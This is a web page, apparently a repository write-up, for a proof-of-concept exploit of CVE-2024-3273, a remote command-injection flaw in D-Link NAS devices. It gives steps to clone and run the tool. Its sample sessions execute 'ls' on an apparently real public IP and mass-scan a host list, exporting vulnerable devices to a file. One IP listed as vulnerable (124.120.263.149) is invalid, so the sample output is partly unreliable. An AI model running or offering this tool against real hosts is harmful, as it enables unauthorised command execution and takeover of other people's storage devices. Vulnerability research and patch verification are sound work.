This repository contains a Proof of Concept (PoC) for CVE-2024-3273, a security vulnerability discovered in D-Link NAS devices.
The vulnerability allows attackers to execute arbitrary commands on vulnerable devices.
CVE-2024-3273 is a vulnerability in D-Link NAS devices that allows remote attackers to execute arbitrary commands via a crafted HTTP request to the cgi-bin/nas_sharing.cgi
endpoint.
This PoC demonstrates how the vulnerability can be exploited to execute commands on vulnerable D-Link NAS devices.
requests
librarygit clone https://github.com/adhikara13/CVE-2024-3273.git
2. Navigate to the repository directory:
cd CVE-2024-3273
3. Run the PoC:
python main.py
4. Follow the on-screen instructions to choose the target device:
host:port
, and choose whether to export vulnerable hosts to vulnerables.txt
.┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi
┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.
Starship is a powerful, minimal, and highly customizable cross-shell prompt designed to enhance the terminal…
Lemmy is an innovative, open-source platform designed for link aggregation and discussion, providing a decentralized…
The latest release of ImHex v1.37.0 introduces a host of exciting features and improvements, enhancing…
Ghauri is a cutting-edge, cross-platform tool designed to automate the detection and exploitation of SQL…
Writing tools have become indispensable for individuals looking to enhance their writing efficiency, accuracy, and…
PatchWerk is a proof-of-concept (PoC) tool designed to clean NTDLL syscall stubs by patching syscall…